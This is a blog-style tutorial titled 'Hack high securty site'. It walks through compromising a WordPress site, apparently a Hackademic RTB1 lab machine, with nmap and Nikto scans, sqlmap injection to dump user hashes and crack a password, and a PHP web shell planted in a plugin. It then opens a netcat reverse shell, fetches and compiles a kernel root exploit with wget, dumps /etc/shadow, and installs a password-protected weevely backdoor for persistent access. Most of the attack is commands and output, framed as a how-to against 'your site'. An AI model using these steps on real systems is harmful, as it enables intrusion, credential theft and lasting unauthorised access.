Hack high securty site
The
answer to this question may be difficult to determine, simply because there are
so many ways to hack a site. Our aim in this article to show you the techniques
most used by hackers in targeting and hacking your site!
Let’s
suppose that this is your site: hack-test.com
Let’s
ping this site to get the server IP:
Now we
have 173.236.138.113 – this is the server IP where our target site is hosted.
To find
other sites hosted on the same server, we will use sameip.org:
ID
|
Domain
|
Site Link
|
1
|
hijackthisforum.com
|
|
2
|
sportforum.net
|
|
3
|
freeonlinesudoku.net
|
|
4
|
cosplayhell.com
|
|
5
|
videogamenews.org
|
|
6
|
gametour.com
|
|
7
|
qualitypetsitting.net
|
|
8
|
brendanichols.com
|
|
9
|
8ez.com
|
|
10
|
hack-test.com
|
|
11
|
kisax.com
|
|
12
|
paisans.com
|
|
13
|
mghz.com
|
|
14
|
debateful.com
|
|
15
|
jazzygoodtimes.com
|
|
16
|
fruny.com
|
|
17
|
vbum.com
|
|
18
|
wuckie.com
|
|
19
|
force5inc.com
|
|
20
|
virushero.com
|
|
21
|
twincitiesbusinesspeernetwork.com
|
|
22
|
jennieko.com
|
|
23
|
davereedy.com
|
|
24
|
joygarrido.com
|
|
25
|
prismapp.com
|
|
26
|
utiligolf.com
|
Twenty-six
other websites are hosted on this server [173.236.138.113]. Many hackers will
target all other sites on the same server in order to hack your site. But for
the purpose of study, we will target your site only and put aside hacking the
other sites on same server.
We’ll
need more information about your site, such as:
1.
DNS records (A, NS, TXT, MX and SOA)
2.
Web Server Type (Apache,
IIS, Tomcat)
3.
Registrar (the company
that owns your domain)
4.
Your name, address,
email and phone
5.
Scripts that your site
uses (php, asp, asp.net, jsp, cfm)
6.
Your server OS
(Unix,Linux,Windows,Solaris)
7.
Your server open ports
to internet (80, 443, 21, etc.)
Let’s start with finding your site’s DNS
records. We will use the website “Who.is” to achieve this:
We have
discovered that your site DNS records are:
HACK-TEST.COM DNS RECORDS
Record
|
Type
|
TTL
|
Priority
|
Content
|
hack-test.com
|
A
|
4 hours
|
173.236.138.113 ()
|
|
hack-test.com
|
SOA
|
4 hours
|
ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283
1800 1814400 14400
|
|
hack-test.com
|
NS
|
4 hours
|
ns1.dreamhost.com
|
|
hack-test.com
|
NS
|
4 hours
|
ns3.dreamhost.com
|
|
hack-test.com
|
NS
|
4 hours
|
ns2.dreamhost.com
|
|
www.hack-test.com
|
A
|
4 hours
|
173.236.138.113 ()
|
Let’s
determine the web server type:
As you
see, your site web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0 3 Month: 3.7
Now it
is time to find your Doman Registrar and your name, address, email and phone:
We have
now got your registrar and other vital information about you. We can find the
type of scripts on your site (the OS type, web server version) by using a cool
tool in backtrack 5 R1 called Whatweb:
Now we
found that your site is using a famous php script called WordPress, that your
server os is Fedora Linux and that your web server version is (apache 2.2.15),
let’s find open ports in your server.
To do
this, we will use nmap:
1 –
Find services that run on server
01
02
03
04
05
06
07
08
09
10
11
12
13
14
|
root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com
(192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.15
((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report
any incorrect results at http://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned
in 11.56 seconds
|
2 –
Find server OS
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
|
root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com
(192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp closed ssh
80/tcp open http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any
incorrect results at http://nmap.org/submit/
.
Nmap done: 1 IP address (1 host up) scanned
in 7.42 seconds
|
Only
port 80 is open and OS is Linux 2.6.22(Fedora Core 6)
Now
that we have gathered all the important information about your site, let’s scan
it for vulnerabilities like
Sql
injection – Blind sql injection – LFI – RFI – XSS – CSRF, and so forth.
We will
use Nikto.pl to gather info, perhaps, some vulnerabilities:
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
root@bt:/pentest/web/nikto# perl nikto.pl -h
http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP: 192.168.1.2
+ Target Hostname: hack-test.com
+ Target Port: 80
+ Start Time: 2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748,
size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated
(current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64
are also current.
+ Allowed HTTP Methods: GET, HEAD, POST,
OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active,
suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing
found.
+ OSVDB-3233: /icons/README: Apache default
file found.
+ 6448 items checked: 1 error(s) and 6
item(s) reported on remote host
+ End Time: 2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
|
We will
also use W3AF. You can find this tool in backtrack 5 R1
01
02
03
04
05
06
07
08
09
10
11
12
13
14
|
root@bt:/pentest/web/w3af#
./w3af_gui
Starting w3af, running on:
Python version:
2.6.5 (r265:79063, Apr 16 2010, 13:57:41)
[GCC 4.4.3]
GTK version: 2.20.1
PyGTK version: 2.17.0
w3af - Web Application Attack and Audit
Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
|
We will
insert our site URL and choose full audit option:
After
some time, the scan will finish and you will see
Your
site is vulnerable to sql injection, xss and others!
Let’s
investigate the sql injection vulnerability:
This is
the vulnerable url and cat is the vulnerable parameter.
So,
let’s exploit this vulnerability:
We will
find that exploitating this vuln failed, so we will use sqlmap to the job and
dump all database information that we need to hack this site J
Using
sqlmap with –u url
After
some seconds you will see
Type n
and press enter to continue
As you
see your site is vulnerable to error-based sql injection and your mysql
database version is 5
Let’s
find all databases in your site by adding “–dbs ”
Now we
found 3 databases
We will
dump wordpress database tables by adding “–D wordpress –tables ”
We will
find all wordpress tables
We want
to dump “wp_users” table, so we will find all users (admin?) information (user
is and password hash) and try to crack hash and enter wordpress control panel (
wp-admin)
We will
columns of “wp_users” table by adding “-T wp_users –columns ”
We will
find 22 columns
We just
need to dump to columns, so we will dump (user_login and user_pass ) columns by
adding
-C
user_login,user_pass –dump
We will
find important information; we found now users and pass hashes
but we
want to crack those hashes to clear text passwords. We will use the online site
“http://www.onlinehashcrack.com/free-hash-reverse.php”
And try
to crack this hash 7CBB3252BA6B7E9C422FAC5334D22054
And
clear text password is q1w2e3
And
user name is “GeorgeMiller”
We will
login with these details in “wp-admin ”
And we
are in!
Ok let’s try to upload php web shell to run some linux commands
on your site server J
We will
edit a plugin in wordpress called “Textile ”
or any plugin you found in plugins page.
And
choose to edit it
We will
insert php web shell instead of real plugin. After we’ve done this, we will hit
“update file” and browse to our new php shell
Woo,
the php shell works. Now we can manipulate your site files, but we want only to
get root on your server and hack all other sites too.
We will
choose “back-connect “tab from php web shell and make back connection to our ip
“192.168.1.6″ on port “5555″
But
before we hit connect, we first make netcat listen on port “5555″ on our
attacker machine
Now hit
connect and you will see:
Let’s
try some linux commands
01
02
03
04
05
06
07
08
09
10
11
|
id
uid=48(apache) gid=489(apache)
groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686
#1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
|
Id
command is used to show us what user id, group.
pwd
command is used to show us our current path on server
uname
–a command is used to show us some information about kernel version
Ok, now
we knew that server kernel version is 2.6.31.5-127.fc12.1686
Let’s
search in exploit-db.com for exploit to this version or newer version
We will
type “kernel 2.6.31 ”
Date
|
D
|
A
|
V
|
Description
|
Plat.
|
Author
|
|
2009-10-15
|
-
|
|
904
|
||||
2009-08-31
|
-
|
|
1370
|
||||
2009-08-25
|
-
|
|
1059
|
||||
2009-08-04
|
-
|
|
1064
|
After I
tried all of them on your server, none of them worked, but then I tried a new
exploit
Date
|
D
|
A
|
V
|
Description
|
Plat.
|
Author
|
|
2010-10-19
|
-
|
|
9977
|
I
opened this url and copied this link
http://www.exploit-db.com/download/15285
And
made this command on my netcat shell
01
02
03
04
05
06
07
08
09
10
11
12
13
|
wget http://www.exploit-db.com/download/15285
-O roro.c
--2011-12-28 00:48:01-- http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com...
199.27.135.111, 199.27.134.111
Connecting to
www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301
Moved Permanently
Location: http://www.exploit-db.com/download/15285/
[following]
--2011-12-28 00:48:02-- http://www.exploit-db.com/download/15285/
Connecting to
www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200
OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
0K ...... 100% 29.7K=0.2s
|
We used
wget command to fetch exploit from exploit-db.com and used –O to rename it to
roro.c
Note: linux
kernel exploits mostly is being delopped in c language so we saved it in .c extension,
just view exploit source and you will find
#include <stdio.h>
|
#include <unistd.h>
|
#include <stdlib.h>
|
#include <fcntl.h>
|
#include <sys/types.h>
|
#include <sys/socket.h>
|
#include <netinet/in.h>
|
#include <errno.h>
|
#include <string.h>
|
#include <sys/ptrace.h>
|
#include <sys/utsname.h>
|
#define RECVPORT 5555
|
#define SENDPORT 6666
|
int prep_sock(int port)
|
{
|
int s, ret;
|
struct sockaddr_in addr;
|
s = socket(PF_RDS, SOCK_SEQPACKET, 0);
|
if(s < 0) {
|
printf(“[*] Could not open socket.\n”);
|
exit(-1);
|
}
|
memset(&addr, 0, sizeof(addr));
|
All the
above lines indicate that this is exploit is written in C language
After
we saved our exploit on server, we will compile it to elf format by typing
gcc roro.c –o roro
And run
our exploit by typing
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
|
./roro
[*] Linux kernel >= 2.6.30 RDS socket
exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to
0xc044e452
[*] Overwriting function pointer...
[*] Linux kernel >= 2.6.30 RDS socket
exploit
[*] by Dan Rosenberg
[*] Resolving kernel addresses...
[+] Resolved rds_proto_ops to 0xe09f0b20
[+] Resolved rds_ioctl to 0xe09db06a
[+] Resolved commit_creds to 0xc044e5f1
[+] Resolved prepare_kernel_cred to
0xc044e452
[*] Overwriting function pointer...
[*] Triggering payload...
[*] Restoring function pointer...
|
And
after that we type
Id
We will
find that we are root J
uid=0(root) gid=0(root)
We can
now view /etc/shadow file
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
cat /etc/shadow
root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14557::::::
avahi-autoipd:!!:14557::::::
ntp:!!:14557::::::
dbus:!!:14557::::::
rtkit:!!:14557::::::
nscd:!!:14557::::::
tcpdump:!!:14557::::::
avahi:!!:14557::::::
haldaemon:!!:14557::::::
openvpn:!!:14557::::::
apache:!!:14557::::::
saslauth:!!:14557::::::
mailnull:!!:14557::::::
smmsp:!!:14557::::::
smolt:!!:14557::::::
sshd:!!:14557::::::
pulse:!!:14557::::::
gdm:!!:14557::::::
p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::
mysql:!!:14981::::::
|
And
view /etc/passwd file
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:499:virtual console memory
owner:/dev:/sbin/nologin
avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin
nscd:x:28:493:NSCD Daemon:/:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
haldaemon:x:68:491:HAL
daemon:/:/sbin/nologin
openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin
apache:x:48:489:Apache:/var/www:/sbin/nologin
saslauth:x:495:488:"Saslauthd
user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin
smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin
sshd:x:74:484:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
pulse:x:493:483:PulseAudio System
Daemon:/var/run/pulse:/sbin/nologin
gdm:x:42:481::/var/lib/gdm:/sbin/nologin
p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash
mysql:x:27:480:MySQL
Server:/var/lib/mysql:/bin/bash
|
We can
crack all users passwords with the “john the ripper” tool.
But we
will not do this; we want to maintain access on this server so we can come to
visit/hack it any time J
We will
use weevely to a small and encoded php backdoor with the password protected and
upload this php backdoor to our server.
Let’s
do it
1 – weevely
usage options :
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
|
root@bt:/pentest/backdoors/web/weevely#
./main.py -
Weevely 0.3 - Generate and manage stealth
PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Usage: main.py [options]
Options:
-h, --help show this help message and exit
-g, --generate Generate backdoor crypted
code, requires -o and -p .
-o OUTPUT, --output=OUTPUT
Output filename for generated backdoor .
-c COMMAND, --command=COMMAND
Execute a single command and exit, requires
-u and -p
.
-t, --terminal Start a terminal-like
session, requires -u and -p .
-C CLUSTER, --cluster=CLUSTER
Start in cluster mode reading items from the
give
file, in the form 'label,url,password' where
label is
optional.
-p PASSWORD, --password=PASSWORD
Password of the encrypted backdoor .
-u URL, --url=URL Remote backdoor URL .
|
2 –
Creating a php backdoor with password koko by using weevely:
1
2
3
4
5
6
7
8
|
root@bt:/pentest/backdoors/web/weevely#
./main.py -g -o hax.php -p koko
Weevely 0.3 - Generate and manage stealth
PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Backdoor file 'hax.php' created with
password 'koko'.
|
3 –
Upload our php backdoor to server using php web shell
And
after we upload it we will connect to it using
01
02
03
04
05
06
07
08
09
10
11
12
|
root@bt:/pentest/backdoors/web/weevely#
./main.py -t -u http://hack-test.com/Hackademic_RTB1/wp-content/plugins/hax.php
-p koko
Weevely 0.3 - Generate and manage stealth
PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method 'system()'.
+ Retrieving terminal basic environment
variables .
[apache@HackademicRTB1
/var/www/html/Hackademic_RTB1/wp-content/plugins]
|
Testing
our hax.php backdoor
No comments:
Post a Comment